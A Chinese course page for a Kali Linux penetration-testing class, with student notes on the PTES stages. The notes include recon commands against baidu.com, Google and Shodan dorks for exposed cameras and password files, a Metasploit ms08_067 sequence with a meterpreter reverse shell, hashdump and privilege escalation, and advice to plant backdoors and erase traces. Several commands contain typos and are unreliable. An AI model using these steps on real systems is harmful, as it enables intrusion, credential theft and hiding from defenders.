76618人加入学习
(31人评价)
Kali Linux安全测试方法
价格 ¥ 99.00
会员免费学 购买课程

kali渗透测试

被动信息收集:      

[展开全文]

searchsploit vsftp#搜索某服务各版本有哪些漏洞

use exploit/windows/smb/ms08_067_netapi #

 

[展开全文]

nmap -sS 192.168.1.116#扫描'192.168.1.116'服务器开放了哪些端口

nmap -p21 -sV 192.168.1.116#扫描'192.168.1.116'服务器的'21'号端口跑了哪些服务

 

[展开全文]

dig @www.baidu.com baidu.com axfr #对服务器进行区域传输,获取网络结构

whios baidu.com #获取baidu的域名注册信息(若whios没有可自行安装)

fierce -dnsserver 8.8.8.8 -dns baidu.com /usr/share/fierce/hosts.txt #根据字典对baidu.com进行暴力破解,破解域名下有哪些主机记录(综合性破解,需要提供字典)

dnsercon -d baidu.com -t std --lifetime 10 #和上面工具类似,-t 类型 --lifetime 超时的时间


 

[展开全文]

后渗透测试:1扩大战果内网渗透-内网扫描-抓包分析-(arp)地址欺骗

2本地提权   3获取数据  4擦除痕迹 5留后门

最后测试报告

1管理层报告-风险级别-风险分类-整改规划

2技术报告-漏洞细节-漏洞复现-修补方案

总结:安全工作的目标是实现安全。姿态要低。

PETS是安全实操的方法论,掌握标准但不迷信,

保持学习状态,重视理论研究,多做手上实践

[展开全文]

威胁建模

 

从技术黑盒的角度进行威胁建模

-工具,技术,能力发现被攻击面

-确定实施渗透的最佳路径

-确定控制,流程,架构

 

结果作为渗透测试报告的一部分提交

漏洞分析

1.漏洞扫描-NessusOpenvas,nexpose,nmap scrip,

2.已知漏洞利用-sandi-GuiSearsploit,Metasploit,Armitage

 

用serchsploit搜索历史的vsftp漏洞,它还给出了漏洞利用脚本

sandi也可以

 

用iceweasel来全面扫描某个IP的漏洞(openvas)

 

Msf

 use exploit/windows/smb/ms08_067_netapi

 set playload windows/meterpreter/reverse_tcp

 show options

 set rhost=192.168.1.1

 

 sysinfo

 getpid//找到注入的进程

 getsystem//提权

 hashdump//获取本地密码的hash

 screenshot//查看屏幕快照

 run vnc//查看机器活动状态

[展开全文]

 

Nslookup 用谷歌的DNS服务器解析百度的DNS服务器《=dig @8.8.8.8 baidu.com ns

用dig命令,使用谷歌的DNS服务器解析百度的邮箱服务器的域名,再基于这些域名进一步搜索主机记录,最后解析出邮箱服务器的IP地址

 

dig @8.8.8.8 +noall +answer txt choas VERDION.BIND @dns.baidu.com

   dns.baidu.com 域名对应的dns服务器的bind信息返回(若隐藏的好不行)

 

 

dig @dns.baidu.com baidu.com axfr       //通过dns.baidu.com取得百度的区域传输记录,

若拿到,网络结构就曝光了

[展开全文]

渗透测试标准PETS

1 前期沟通  公司会给域名啥的

2 信息收集 

域名,邮箱,人员,地址(Nslookup,dig,whois,Fierce,Dnsrecon)

搜索引擎:shodan,google

Metadata

专属密码字典:Cupp(一般用所有个人信息的组合来生成密码字典)

3 威胁建模

 

4 漏洞分析

5 渗透攻击

6 后渗透测试

7 测试报告

 

Shodan(它可以搜索互联网上的设备):

Netscreen port:22 county:CN city:Beijing net:

 

联网摄像头:(搜摄像头开了实时流协议,相当于cctv)

port:554 has_screenshottrue

 

Google :inurt ".php?id可以搜到一些能够向数据库提交数据的点;

    搜摄像头:inititle:"netbotz appliance " "ok"

搜一些存了账号密码网站:filetype:xls "username | password"

[展开全文]

软件安全生命周期

 

需求 设计 编码 测试 上线 运维

 

安全需求》系统架构》编码规范》代码审计》部署规范》环境审计  

 

渗透测试的意义:安全建设(周期长,投入大,效果不易测量)

   渗透测试(从问题出发检查系统安全,从骇客角度审视,在资源有限的情况下效率更高--发现问题解决问题)

渗透测试的目标是达到安全

Kali Linux:前身是bt5r3

 黑帽/白帽 专用的操作系统

渗透测试和安全审计的平台

安全工具的军火库

目前包含工具600+

支持ARM的多平台

[展开全文]

提权,拿shell,留后门,但是要擦好痕迹,不然凉凉

[展开全文]

openvas是神器,推荐优先使用,用于扫描。

msf用于利用,利用时要看好漏洞信息。

[展开全文]

主机扫描:nmap –Ss 网址

防火墙识别 :wafwoof  网址

[展开全文]

Google hacking的使用

被动收集:nslook,dig,whois,fierce的使用;

密码字典用cupp,主要特点私人定制

[展开全文]

软件的安全周期:

需求->设计 ->编码-> 测试-> 上线-> 运维 安全需求-> 系统架构-> 编码规范-> 代码审计-> 部署规范-> 环境审计

渗透测试是为了测试检查系统安全,而不是破坏

[展开全文]

渗透测试标准-渗透攻击和后渗透测试以及测试报告

payload msfvenom -l apyloads 

老师也出现了问题,所以还是说要认真严谨啊

veil-evasion

wifite无线攻击

密码破解

社会工程 setoolkit

后渗透测试

扩大战果内网渗透 本地提权 获取数据 擦除痕迹 留后门

[展开全文]

渗透测试标准-威胁建模和漏洞分析

searchsploit

sandi

web渗透:nikto burpsuite owasp zap sqlmap

可以结合使用,效果更佳

[展开全文]

渗透测试标准-主动信息收集

nmap -sS(不建立完整的连接) -p(port) -sV(version)

snmp,smb,smtp,web

shell脚本的重要性

lbd 

[展开全文]

渗透测试标准-前期沟通和被动信息收集

前期沟通-信息收集-威胁建模-漏洞分析-渗透攻击-后渗透测试-测试报告

dig @域名 目标名

whois 

fierce -dnsserver -dns 

cupp 定制密码

[展开全文]

安全问题的根源、软件安全生命周期、渗透测试的意义

人作为分层的一部分

安全需求,系统架构,编码规范,代码审计,部署规范,环境审计

 

[展开全文]

授课教师

安全经理

课程特色

视频(5)
下载资料(1)
考试(1)

学员动态

ssz3261 加入学习
Grodd 加入学习
I0ngEr 加入学习
sunLIGHT 加入学习
Swingman 加入学习